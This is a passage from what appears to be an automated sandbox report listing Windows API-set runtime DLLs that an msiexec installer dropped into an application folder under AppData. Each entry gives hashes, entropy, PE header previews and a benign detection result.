                                                          SHA-512:9AB9B5B12215E57AF5B3C588ED5003D978071DC591ED18C78C4563381A132EDB7B2C508A8B75B4F1ED8823118D23C88EDA453CD4B42B9020463416F8F6832A3D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0......./....`.........................................`...L............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.730719514840594
                                                          Encrypted:false
                                                          SSDEEP:192:/VyWYhWjAWWFYg7VWQ4eWiuNwzNbDXbBqnaj0q:/VyWYhW8g+LbBlwq
                                                          MD5:3BF4406DE02AA148F460E5D709F4F67D
                                                          SHA1:89B28107C39BB216DA00507FFD8ADB7838D883F6
                                                          SHA-256:349A79FA1572E3538DFBB942610D8C47D03E8A41B98897BC02EC7E897D05237E
                                                          SHA-512:5FF6E8AD602D9E31AC88E06A6FBB54303C57D011C388F46D957AEE8CD3B7D7CCED8B6BFA821FF347ADE62F7359ACB1FBA9EE181527F349C03D295BDB74EFBACE
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0............`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.626458901834476
                                                          Encrypted:false
                                                          SSDEEP:192:P9RWYhWEWWFYg7VWQ4eWncTjxceXqnajLJS:LWYhWk3TjmAlnJS
                                                          MD5:BBAFA10627AF6DFAE5ED6E4AEAE57B2A
                                                          SHA1:3094832B393416F212DB9107ADD80A6E93A37947
                                                          SHA-256:C78A1217F8DCB157D1A66B80348DA48EBDBBEDCEA1D487FC393191C05AAD476D
                                                          SHA-512:D5FCBA2314FFE7FF6E8B350D65A2CDD99CA95EA36B71B861733BC1ED6B6BB4D85D4B1C4C4DE2769FBF90D4100B343C250347D9ED1425F4A6C3FE6A20AED01F17
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...>G.j.........." .........................................................0............`.........................................`...`............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.577869728469469
                                                          Encrypted:false
                                                          SSDEEP:192:5t6DjZlTIWYhWsWWFYg7VWQ4eW4MtkR/BVrqnajc:5t6Dll0WYhWMqkRLlA
                                                          MD5:3A4B6B36470BAD66621542F6D0D153AB
                                                          SHA1:5005454BA8E13BAC64189C7A8416ECC1E3834DC6
                                                          SHA-256:2E981EE04F35C0E0B7C58282B70DCC9FC0318F20F900607DAE7A0D40B36E80AF
                                                          SHA-512:84B00167ABE67F6B58341045012723EF4839C1DFC0D8F7242370C4AD9FABBE4FEEFE73F9C6F7953EAE30422E0E743DC62503A0E8F7449E11C5820F2DFCA89294
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......M.....`.........................................`................ ...................!..............T............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11712
                                                          Entropy (8bit):6.6496318655699795
                                                          Encrypted:false
                                                          SSDEEP:192:nWYhWNWWFYg7VWQ4uWtGDlR/BVrqnajcU8:nWYhWLJDlRLlAU8
                                                          MD5:A038716D7BBD490378B26642C0C18E94
                                                          SHA1:29CD67219B65339B637A1716A78221915CEB4370
                                                          SHA-256:B02324C49DD039FA889B4647331AA9AC65E5ADC0CC06B26F9F086E2654FF9F08
                                                          SHA-512:43CB12D715DDA4DCDB131D99127417A71A16E4491BC2D5723F63A1C6DFABE578553BC9DC8CF8EFFAE4A6BE3E65422EC82079396E9A4D766BF91681BDBD7837B1
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...*............." .........................................................0......-.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12736
                                                          Entropy (8bit):6.587452239016064
                                                          Encrypted:false
                                                          SSDEEP:192:FvuBL3BBLZWYhWxWWFYg7VWQ4uW4g0jrQYcunYqnajv9Ml:FvuBL3BPWYhWv8jYulhMl
                                                          MD5:D75144FCB3897425A855A270331E38C9
                                                          SHA1:132C9ADE61D574AA318E835EB78C4CCCDDEFDEA2
                                                          SHA-256:08484ED55E43584068C337281E2C577CF984BB504871B3156DE11C7CC1EEC38F
                                                          SHA-512:295A6699529D6B173F686C9BBB412F38D646C66AAB329EAC4C36713FDD32A3728B9C929F9DCADDE562F625FB80BC79026A52772141AD2080A0C9797305ADFF2E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d......c.........." .........................................................0......V`....`.........................................`................ ...................!..............T............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14280
                                                          Entropy (8bit):6.658205945107734
                                                          Encrypted:false
                                                          SSDEEP:384:NOMw3zdp3bwjGzue9/0jCRrndbwNWYhW6WAulh2:NOMwBprwjGzue9/0jCRrndbw5D
                                                          MD5:8ACB83D102DABD9A5017A94239A2B0C6
                                                          SHA1:9B43A40A7B498E02F96107E1524FE2F4112D36AE
                                                          SHA-256:059CB23FDCF4D80B92E3DA29E9EF4C322EDF6FBA9A1837978FD983E9BDFC7413
                                                          SHA-512:B7ECF60E20098EA509B76B1CC308A954A6EDE8D836BF709790CE7D4BD1B85B84CF5F3AEDF55AF225D2D21FBD3065D01AA201DAE6C131B8E1E3AA80ED6FC910A4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......._....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12224
                                                          Entropy (8bit):6.621310788423453
                                                          Encrypted:false
                                                          SSDEEP:96:qo1aCFEWYhWwp/DEs39DHDs35FrsvYgmr0DD0ADEs3TDL2L4m2grMWaLNpDEs3OC:teWYhWVWWFYg7VWQ4yWwAKZRqnajl6x7
                                                          MD5:808F1CB8F155E871A33D85510A360E9E
                                                          SHA1:C6251ABFF887789F1F4FC6B9D85705788379D149
                                                          SHA-256:DADBD2204B015E81F94C537AC7A36CD39F82D7C366C193062210C7288BAA19E3
                                                          SHA-512:441F36CA196E1C773FADF17A0F64C2BBDC6AF22B8756A4A576E6B8469B4267E942571A0AE81F4B2230B8DE55702F2E1260E8D0AFD5447F2EA52F467F4CAA9BC6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...f092.........." .........................................................0............`.........................................`...l............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.7263193693903345
                                                          Encrypted:false
                                                          SSDEEP:192:cWYhWZSWWFYg7VWQ4eWkcc7ZqnajgnLSp:cWYhW84cllk2p
                                                          MD5:CFF476BB11CC50C41D8D3BF5183D07EC
                                                          SHA1:71E0036364FD49E3E535093E665F15E05A3BDE8F
                                                          SHA-256:B57E70798AF248F91C8C46A3F3B2952EFFAE92CA8EF9640C952467BC6726F363
                                                          SHA-512:7A87E4EE08169E9390D0DFE607E9A220DC7963F9B4C2CDC2F8C33D706E90DC405FBEE00DDC4943794FB502D9882B21FAAE3486BC66B97348121AE665AE58B01C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....%..........." .........................................................0......[.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12744
                                                          Entropy (8bit):6.601327134572443
                                                          Encrypted:false
                                                          SSDEEP:192:qKWYhWbWWFYg7VWQ4eWYoWjxceXqnajLJe:qKWYhWJ4WjmAlnJe
                                                          MD5:F43286B695326FC0C20704F0EEBFDEA6
                                                          SHA1:3E0189D2A1968D7F54E721B1C8949487EF11B871
                                                          SHA-256:AA415DB99828F30A396CBD4E53C94096DB89756C88A19D8564F0EED0674ADD43
                                                          SHA-512:6EAD35348477A08F48A9DEB94D26DA5F4E4683E36F0A46117B078311235C8B9B40C17259C2671A90D1A210F73BF94C9C063404280AC5DD5C7F9971470BEAF8B7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0.......Z....`.........................................`...H............ ...................!..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14272
                                                          Entropy (8bit):6.519411559704781
                                                          Encrypted:false
                                                          SSDEEP:192:AWXk1JzX9cKSIvWYhWLWWFYg7VWQ4SWW0uI7oinEqnajxMyqY:AWXk1JzNcKSIvWYhW5+uOEle6
                                                          MD5:E173F3AB46096482C4361378F6DCB261
                                                          SHA1:7922932D87D3E32CE708F071C02FB86D33562530
                                                          SHA-256:C9A686030E073975009F993485D362CC31C7F79B683DEF713E667D13E9605A14
                                                          SHA-512:3AAFEFD8A9D7B0C869D0C49E0C23086115FD550B7DC5C75A5B8A8620AD37F36A4C24D2BF269043D81A7448C351FF56CB518EC4E151960D4F6BD655C38AFF547F
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...j............." .........................................................0......%C....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.659079053710614
                                                          Encrypted:false
                                                          SSDEEP:192:NtxDfIeA6WYhW7WWFYg7VWQ4eWpB5ABzR/BVrqnajcb:NtxDfIeA6WYhWp28RLlA
                                                          MD5:9C9B50B204FCB84265810EF1F3C5D70A
                                                          SHA1:0913AB720BD692ABCDB18A2609DF6A7F85D96DB3
                                                          SHA-256:25A99BDF8BF4D16077DC30DD9FFEF7BB5A2CEAF9AFCEE7CF52AD408355239D40
                                                          SHA-512:EA2D22234E587AD9FA255D9F57907CC14327EAD917FDEDE8B0A38516E7C7A08C4172349C8A7479EC55D1976A37E520628006F5C362F6A3EC76EC87978C4469CD
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......6y....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11200
                                                          Entropy (8bit):6.7627840671368835
                                                          Encrypted:false
                                                          SSDEEP:192:clIHyZ36WYhWulWWFYg7VWQ4yWqeQDbLtsQlmqnajlDC:clIHyZKWYhWKhlbp6l9C
                                                          MD5:0233F97324AAAA048F705D999244BC71
                                                          SHA1:5427D57D0354A103D4BB8B655C31E3189192FC6A
                                                          SHA-256:42F4E84073CF876BBAB9DD42FD87124A4BA10BB0B59D2C3031CB2B2DA7140594
                                                          SHA-512:8339F3C0D824204B541AECBD5AD0D72B35EAF6717C3F547E0FD945656BCB2D52E9BD645E14893B3F599ED8F2DE6D3BCBEBF3B23ED43203599AF7AFA5A4000311
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....f............" .........................................................0.......>....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12224
                                                          Entropy (8bit):6.590253878523919
                                                          Encrypted:false
                                                          SSDEEP:192:4GeVvXK9WYhW1WWFYg7VWQ4yWj6k50IsQlmqnajlDl:4GeVy9WYhWzVk6l9l
                                                          MD5:E1BA66696901CF9B456559861F92786E
                                                          SHA1:D28266C7EDE971DC875360EB1F5EA8571693603E
                                                          SHA-256:02D987EBA4A65509A2DF8ED5DD0B1A0578966E624FCF5806614ECE88A817499F
                                                          SHA-512:08638A0DD0FB6125F4AB56E35D707655F48AE1AA609004329A0E25C13D2E71CB3EDB319726F10B8F6D70A99F1E0848B229A37A9AB5427BFEE69CD890EDFB89D2
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...._............" .........................................................0.......S....`.........................................`................ ...................!..............T............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.672720452347989
                                                          Encrypted:false
                                                          SSDEEP:192:byMvQWYhW5fWWFYg7VWQ4eWio3gDwcunYqnajv9JS:byMvQWYhW/BXwulhw
                                                          MD5:7A15B909B6B11A3BE6458604B2FF6F5E
                                                          SHA1:0FEB824D22B6BEEB97BCE58225688CB84AC809C7
                                                          SHA-256:9447218CC4AB1A2C012629AAAE8D1C8A428A99184B011BCC766792AF5891E234
                                                          SHA-512:D01DD566FF906AAD2379A46516E6D060855558C3027CE3B991056244A8EDD09CE29EACEC5EE70CEEA326DED7FC2683AE04C87F0E189EBA0E1D38C06685B743C9
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....<.........." .........................................................0.......g....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13760
                                                          Entropy (8bit):6.575688560984027
                                                          Encrypted:false
                                                          SSDEEP:192:L1dv3V0dfpkXc2MAvVaoKKDWYhWTJWWFYg7VWQ4uWoSUtpwBqnajrmaaGWpmJ:Zdv3V0dfpkXc0vVaeWYhWj/qlQGWpmJ
                                                          MD5:6C3FCD71A6A1A39EAB3E5C2FD72172CD
                                                          SHA1:15B55097E54028D1466E46FEBCA1DBB8DBEFEA4F
                                                          SHA-256:A31A15BED26232A178BA7ECB8C8AA9487C3287BB7909952FC06ED0D2C795DB26
                                                          SHA-512:EF1C14965E5974754CC6A9B94A4FA5107E89966CB2E584CE71BBBDD2D9DC0C0536CCC9D488C06FA828D3627206E7D9CC8065C45C6FB0C9121962CCBECB063D4F
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d......c.........." .........................................................0............`.........................................`...X............ ...................!..............T............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.70261983917014
                                                          Encrypted:false
                                                          SSDEEP:192:ztZ3XWYhW3WWFYg7VWQ4eWNnpit7ZqnajgnLSl:ztZ3XWYhWVg+llk2
                                                          MD5:D175430EFF058838CEE2E334951F6C9C
                                                          SHA1:7F17FBDCEF12042D215828C1D6675E483A4C62B1
                                                          SHA-256:1C72AC404781A9986D8EDEB0EE5DD39D2C27CE505683CA3324C0ECCD6193610A
                                                          SHA-512:6076086082E3E824309BA2C178E95570A34ECE6F2339BE500B8B0A51F0F316B39A4C8D70898C4D50F89F3F43D65C5EBBEC3094A47D91677399802F327287D43B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0......G.....`.........................................`...x............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12744
                                                          Entropy (8bit):6.599515320379107
                                                          Encrypted:false
                                                          SSDEEP:192:fKIMFFyWYhW6WWFYg7VWQ4eWoVjxceXqnajLJ4:fcyWYhWKRjmAlnJ4
                                                          MD5:9D43B5E3C7C529425EDF1183511C29E4
                                                          SHA1:07CE4B878C25B2D9D1C48C462F1623AE3821FCEF
                                                          SHA-256:19C78EF5BA470C5B295DDDEE9244CBD07D0368C5743B02A16D375BFB494D3328
                                                          SHA-512:C8A1C581C3E465EFBC3FF06F4636A749B99358CA899E362EA04B3706EAD021C69AE9EA0EFC1115EAE6BBD9CF6723E22518E9BEC21F27DDAAFA3CF18B3A0034A7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...r............" .........................................................0............`.........................................`...H............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.690164913578267
                                                          Encrypted:false
                                                          SSDEEP:192:4EWYhWdWWFYg7VWQ4eWvvJ6jxceXqnajLJn:4EWYhWbwYjmAlnJ
                                                          MD5:43E1AE2E432EB99AA4427BB68F8826BB
                                                          SHA1:EEE1747B3ADE5A9B985467512215CAF7E0D4CB9B
                                                          SHA-256:3D798B9C345A507E142E8DACD7FB6C17528CC1453ABFEF2FFA9710D2FA9E032C
                                                          SHA-512:40EC0482F668BDE71AEB4520A0709D3E84F093062BFBD05285E2CC09B19B7492CB96CDD6056281C213AB0560F87BD485EE4D2AEEFA0B285D2D005634C1F3AF0B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....Y$..........." .........................................................0.......d....`.........................................`...H............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11720
                                                          Entropy (8bit):6.615761482304143
                                                          Encrypted:false
                                                          SSDEEP:192:dZ89WYhWFWWFYg7VWQ4eW5QLyFqnajziMOci:dZ89WYhWDnolniMOP
                                                          MD5:735636096B86B761DA49EF26A1C7F779
                                                          SHA1:E51FFBDDBF63DDE1B216DCCC753AD810E91ABC58
                                                          SHA-256:5EB724C51EECBA9AC7B8A53861A1D029BF2E6C62251D00F61AC7E2A5F813AAA3
                                                          SHA-512:3D5110F0E5244A58F426FBB72E17444D571141515611E65330ECFEABDCC57AD3A89A1A8B2DC573DA6192212FB65C478D335A86678A883A1A1B68FF88ED624659
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......Xc....`.........................................`...<............ ...................!..............T............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12744
                                                          Entropy (8bit):6.627282858694643
                                                          Encrypted:false
                                                          SSDEEP:192:R0WYhWRWWFYg7VWQ4eWLeNxUUtpwBqnajrmaaG:R0WYhWPzjqlQG
                                                          MD5:031DC390780AC08F498E82A5604EF1EB
                                                          SHA1:CF23D59674286D3DC7A3B10CD8689490F583F15F
                                                          SHA-256:B119ADAD588EBCA7F9C88628010D47D68BF6E7DC6050B7E4B787559F131F5EDE
                                                          SHA-512:1468AD9E313E184B5C88FFD79A17C7D458D5603722620B500DBA06E5B831037CD1DD198C8CE2721C3260AB376582F5791958763910E77AA718449B6622D023C7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d..../}..........." .........................................................0......a.....`.........................................0................ ...................!..............T............................................................................rdata.. ...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15816
                                                          Entropy (8bit):6.435326465651674
                                                          Encrypted:false
                                                          SSDEEP:192:JM0wd8dc9cydWYhWyWWFYg7VWQ4eW9jTXfH098uXqnajH/VCf:G0wd8xydWYhWi2bXuXlTV2
                                                          MD5:285DCD72D73559678CFD3ED39F81DDAD
                                                          SHA1:DF22928E43EA6A9A41C1B2B5BFCAB5BA58D2A83A
                                                          SHA-256:6C008BE766C44BF968C9E91CDDC5B472110BEFFEE3106A99532E68C605C78D44
                                                          SHA-512:84EF0A843798FD6BD6246E1D40924BE42550D3EF239DAB6DB4D423B142FA8F691C6F0603687901F1C52898554BF4F48D18D3AEBD47DE935560CDE4906798C39A
                                                          Malicious:false
                                                          Antivirus:
